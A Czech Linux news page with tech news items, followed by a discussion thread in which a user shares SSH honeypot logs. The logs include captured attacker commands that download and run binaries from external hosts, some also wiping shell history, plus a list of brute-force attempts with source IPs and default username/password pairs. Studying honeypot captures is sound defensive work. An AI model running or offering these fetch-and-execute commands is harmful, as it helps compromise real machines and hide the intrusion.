Stanislav Fort, vedoucí vědecký pracovník z Vlčkovy 'kyberbezpečnostní' firmy AISLE, zkoumal dopady Anthropic Mythos (nový AI model od Anthropicu zaměřený na hledání chyb, který před nedávnem vyplašil celý svět) a předvedl, že schopnosti umělé inteligence nejsou lineárně závislé na velikosti nebo ceně modelu a dokázal, že i některé otevřené modely zvládly v řadě testů odhalit ve zdrojových kódech stejné chyby jako Mythos (například FreeBSD CVE-2026-4747) a to s výrazně nižšími provozními náklady.
Federální návrh zákona H.R.8250 'Parents Decide Act', 13. dubna předložený demokratem Joshem Gottheimerem a podpořený republikánkou Elise Stefanik coby spolupředkladatelkou (cosponsor), by v případě svého schválení nařizoval všem výrobcům operačních systémů při nastavování zařízení ověřovat věk uživatelů a při používání poskytovat tento věkový údaj aplikacím třetích stran. Hlavní rozdíl oproti kalifornskému zákonu AB 1043 a kolorádskému SB26-051 je ten, že federální návrh by platil rovnou pro celé USA.
Qwen (čínská firma Alibaba Cloud) představila novou verzi svého modelu, Qwen3.6‑35B‑A3B. Jedná se o multimodální MoE model s 35 miliardami parametrů (3B aktivních), nativní kontextovou délkou až 262 144 tokenů, 'silným multimodálním vnímáním a schopností uvažování' a 'výjimečnou schopností agentického kódování, která se může měřit s mnohem rozsáhlejšími modely'. Model a dokumentace jsou volně dostupné na Hugging Face, případně na čínském Modelscope. Návod na spuštění je už i na Unsloth.
Sniffnet, tj. multiplatformní (Windows, macOS a Linux) open source grafická aplikace pro sledování internetového provozu, byl vydán ve verzi 1.5. V přehledu novinek je vypíchnuta identifikace aplikací komunikujících po síti.
V programovacím jazyce Go naprogramovaná webová aplikace pro spolupráci na zdrojových kódech pomocí gitu Forgejo byla vydána ve verzi 15.0 (Mastodon). Forgejo je fork Gitei.
Současně se SUSECON 2026 proběhne příští čtvrtek v Praze také komunitní Open Developer Summit (ODS) zaměřený na open source a openSUSE. Akce se koná ve čtvrtek 23. 4. (poslední den SUSECONu) v Hilton Prague (místnost Berlin 3) a je zcela zdarma, bez nutnosti registrace na SUSECON. Na programu jsou témata jako automatizace (AutoYaST), DevOps, AI v terminálu, bezpečnost, RISC-V nebo image-based systémy. Všichni jste srdečně zváni.
Český úřad zeměměřický a katastrální zavedl u anonymního nahlížení do katastru nemovitostí novou CAPTCHA ve formě mapové puzzle: nepřihlášení uživatelé musí nově správně otočit devět dlaždic v 3x3 poli tak, aby dohromady daly souvislý obrázek výseče reálné mapy, přičemž na to mají pouze jeden časově omezený pokus. Test je podle uživatelů i odborníků příliš obtížný a na sociálních sítích pochopitelně schytává zaslouženou kritiku a
… více »Byla vydána verze 1.95.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Mozilla prostřednictvím své dceřiné společnosti MZLA Technologies Corporation představila open-source AI klienta Thunderbolt. Primárně je určený pro firemní nasazení.
Firma Cal.com oznámila, že přesouvá svůj produkční kód z otevřeného do uzavřeného repozitáře z důvodu bezpečnostního rizika umělé inteligence, která prý dokáže vyhledávat a zneužívat zranitelnosti rychleji, než by je jejich vývojářský tým stíhal opravovat. Zároveň zveřejnila samostatnou, open-source verzi Cal.diy pod licencí MIT, ovšem bez řady původních funkcí. O tom, zda je toto opatření rozumné, existují pochyby. … více »
13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ /bin/busybox cp; /gweerwe323f 13:26:38 $ 13:26:38 $ mount ;/gweerwe323f 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 13:26:38 $ 13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ cat /bin/echo ;/gweerwe323f 13:26:38 $A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
2018-03-08 14:05:42 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:40 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:39 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 13:26:37 185.234.218.242 30 admin motorola 2018-03-08 12:59:30 POL - 188.125.43.186 1 ethos live 2018-03-08 12:59:29 POL - 188.125.43.186 1 root live 2018-03-08 11:08:51 185.234.218.242 32 root 1234 2018-03-08 10:19:06 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 10:19:05 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 01:53:05 185.234.218.242 30 admin admin1 2018-03-08 00:59:23 185.234.218.242 30 user user 2018-03-07 23:28:07 185.234.218.242 0 usuario usuario 2018-03-07 20:33:47 185.234.218.242 32 root 12345 2018-03-07 19:50:26 185.234.218.242 32 root ubnt 2018-03-07 19:23:26 USA - 192.200.218.166 1 root 12345 2018-03-07 19:23:24 USA - 192.200.218.166 1 root 12345 2018-03-07 19:20:49 185.234.218.242 30 admin default 2018-03-07 19:00:22 185.234.218.242 32 root password 2018-03-07 16:45:31 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:29 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:28 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:27 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:26 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 15:41:13 185.234.218.242 32 root xmhdipc 2018-03-07 13:53:48 185.234.218.242 30 admin password 2018-03-07 13:42:02 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 13:42:01 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 10:03:00 185.234.218.242 0 service service 2018-03-07 09:39:09 185.234.218.242 30 admin pfsense 2018-03-07 09:15:53 USA - 173.14.84.113 2 pi raspberry 2018-03-07 09:15:52 USA - 173.14.84.113 2 pi raspberryraspberry993311 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberry 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberryraspberry993311 2018-03-07 09:11:44 185.234.218.242 30 admin default 2018-03-07 08:50:22 185.234.218.242 32 root 123456 2018-03-07 08:04:05 185.234.218.242 32 root uClinux 2018-03-07 07:40:28 185.234.218.242 32 root 111111 2018-03-06 22:19:23 KOR - 119.192.239.192 1 ethos live 2018-03-06 22:19:19 KOR - 119.192.239.192 1 root live 2018-03-06 19:58:08 JPN - 118.241.240.233 2 pi raspberryraspberry993311 2018-03-06 19:58:07 JPN - 118.241.240.233 2 pi raspberry 2018-03-06 19:58:03 JPN - 118.241.240.233 1 pi raspberryraspberry993311 2018-03-06 19:58:02 JPN - 118.241.240.233 1 pi raspberry 2018-03-04 21:30:50 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:37 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:26 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:13 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:01 CHN - 222.186.172.48 1 root root
.nippon? To je honeypot test na permissions?
$ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
/gweerwe323f. Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME. Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
) a stažení nějakého ddos skritpu a jeho spuštění. Toto se mi děje často jako přes kopírák.
<trolling>
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.
A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D
</trolling>
/etc/motd za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
.
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec meduToto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
$ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808eVirustotal rika toto
Tiskni
Sdílej: